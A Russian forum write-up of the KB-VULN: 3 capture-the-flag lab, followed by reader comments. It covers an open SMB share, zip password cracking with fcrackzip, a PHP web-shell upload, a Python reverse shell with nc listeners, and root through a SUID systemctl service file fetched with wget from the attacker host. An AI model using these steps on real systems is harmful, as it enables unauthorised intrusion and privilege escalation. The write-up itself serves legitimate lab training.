![]() |
Приветствую!
Это прохождение третьей машины из серии KB-VULN. Прохождение предыдущих машин можно посмотреть тут 1 и 2. Найти и скачать коробку можно тутKB-VULN: 3 Исходные данные: Атакуемая машина под управлением Ubuntu linux, на которой есть 2 флага user.txt и root.txt. Основная машина (с которой проводится атака) под управлением ОС Kali Linux Задача: получить 2 флага с целевой машины (user.txt и root.txt) и права пользователя root. Как всегда, сначала найдем атакуемую машину в сети при помощи команды: Код:
~$ sudo netdiscoverКод:
192.168.3.142Код:
~$ nmap -A -p- -v 192.168.3.142Видим 3 сервиса: 22 порт - ssh, 80 порт - http и самба (139, 445 порты). Первым делом стоит проверить самбу, вдруг там есть что-то общедоступное: Код:
~$ smbmap -H 192.168.3.142Видим директорию доступную для чтения и записи - Files, с комментарием: HACK ME ... Этот вызов оказался проще, чем мне казалось, но все по порядку. Для начала следует подключиться к этому каталогу и посмотреть, что в нем (пароль оставляем пустым, просто жмем ENTER ): Код:
~$ smbclient //192.168.3.142/FilesВ каталоге Files был найден всего 1 архив, который и был стянут, однако при распаковке архива оказалось, что он требует пароль: https://forum.antichat.xyz/attachmen...8715921556.png Если же попробовать распаковать архив с пустым паролем, распакуется только древо каталогов "sitemagic", в котором нет ни одного файла (и в принципе нет особо полезной информации). Попробуем забрутить пароль со стандартным словарем: Код:
~$ fcrackzip -u -D -p /home/kali/Lab/rockyou.txt /home/kali/Lab/website.zip -vИ да, пароль найден, теперь спокойно распаковываем архив и видим интересный файл README.txt, в котором есть логин и пароль от админки сайта: https://forum.antichat.xyz/attachmen...8716513394.png Что ж, пойдем смотреть. А перейдя на сайт (http://192.168.3.142) видим очень красивую страницу 404: https://forum.antichat.xyz/attachmen...8714948638.png Нужно подкорректировать файл hosts: Код:
~$ sudo echo "192.168.3.142 kb.vuln" >> /etc/hostshttps://forum.antichat.xyz/attachmen...8717837671.png Зайдя в админку с логином и паролем из файла README.txt (admin::jesse) видно, что есть возможность загружать файлы на сервер, попробуем загрузить самый простой php-шелл следующего содержания: Код:
Я загрузил файл в папку files/editor . Теперь попробуем его использовать (перейдем к этому файлу и передадим команду ls ): Код:
http://kb.vuln/files/editor/shell.php?cmd=lsОкей, теперь попробуем загрузить туда же python revers-shell и запустить его. Содержимое файла rev.py (этот код будет выполняться на стороне сервера. Тут все просто, импортируются стандартные модули и инициируется подключение к основное машине, через порт 1337) : Python: Код:
importhttps://forum.antichat.xyz/attachmen...8719697221.png Теперь запустим прослушиватель на основной машине: Код:
~$ nc -lnvp 1337Код:
http://kb.vuln/files/editor/shell.php?cmd=chmod +x rev.pyКод:
http://kb.vuln/files/editor/shell.php?cmd=python rev.pyМы внутри, пойдем, попробуем прочитать пользовательский флаг: Код:
www-data@kb-server:/var/www/html/sitemagic/files/editor$ cat /home/heisenberg/user.txthttps://forum.antichat.xyz/attachmen...8722365164.png Пользовательский флаг есть, время получать рут. И тут я завис на продолжительное время.... Просмотр истории команд пользователя ничего не дал, поиск паролей в файловой системе - тоже, из-под судо, разумеется тоже ничего сделать нельзя. По итогу пароль пользователя я так и не нашел, и доступ к учетной записи heisenberg я тоже не получил, но зато поиск фалов, исполняемых от рута показал bin/systemctl Код:
www-data@kb-server:/$ find / -perm -u=s -type f 2>/dev/nullЭтот вектор атаки мне уже знаком, поэтому я и выбрал его. Все, что нужно - добавить свой сервис, который будет подключаться к основной машине, давая шелл. Подготовленный файл toor.service выглядит вот так: Bash: Код:
[Код:
~$ sudo python -m SimpleHTTPServer 80Код:
www-data@kb-server:/dev/shm$ wget http://192.168.3.131/toor.serviceПредварительно запустим прослушиватель на основной машине: Код:
~$ nc -lnvp 4444Код:
www-data@kb-server:/dev/shm$ cd /etc/systemd/system/multi-user.target.wantsКод:
www-data@kb-server:/etc/systemd/system/multi-user.target.wants$ systemctl enable /dev/shm/toor.serviceCreated symlink /etc/systemd/system/toor.service -> /dev/shm/toor.service. Код:
www-data@kb-server:/etc/systemd/system/multi-user.target.wants$ systemctl start toorhttps://forum.antichat.xyz/attachmen...8723871708.png I'AM ROOT !!! Рут получен, пошли, заберем заслуженный рут-флаг: https://forum.antichat.xyz/attachmen...8723987161.png Сам флаг- 49360ba4cbe27a1b900df25b247315d7 На этом все, в серии машин KB-VULN осталась еще одна машина KB:VULN-FINAL, но выкладывать её прохождение я уже не буду, как и прохождение других машин, так-как эти врайтапы, видимо вообще никому не интересны, что очень печально. Ну и как всегда, если кто-то нашел другой способ прохождения данный коробки, пожалуйста поделитесь в комментариях, или в личку. Большое спасибо всем, кто дочитал этот врайтап до конца. |
Что значит "никому не интересно"? Очень интересно новичкам, которым важно понять направление, ход размышлений, который приводит к определенному порядку действий. Если статьи не вызвали мгновенный взрыв аплодисментов, это не значит, что они никому не интересны не будут читаться. Бороздя просторы интернета и, в частности, форума Antichat, часто находишь статьи, написанные уже давно, но актуальные для прочтения в настоящий момент. И, к тому же, не все читатели оставляют отзывы. Да, я тоже после прочтения не побегу решать упомянутую машинку. И навряд ли оставил бы комментарий, если бы не последний абзац статьи. Но, может, Ваш опыт поможет мне в решении других задач.
Спасибо за Вашу работу. Еще не один человек помянет Вас добрым словом, пусть и про себя. |
Спасибо за оценку и отзыв, очень мотивирует продолжать подобную деятельность)
|
Молодца, отличная статья! И исходники для тех кто захочет повторить есть, шикарно.
Ждем следующую статью! |
Неплохо все расписано. Я даже для себя кое что взял! Продолжай писать, все хорошо получается)))
|
Цитата:
|
Когда открываю коробку на виртуалке, то просит kb-server login и password соответсвенно. Не подскажете креды?
|
| Время: 23:45 |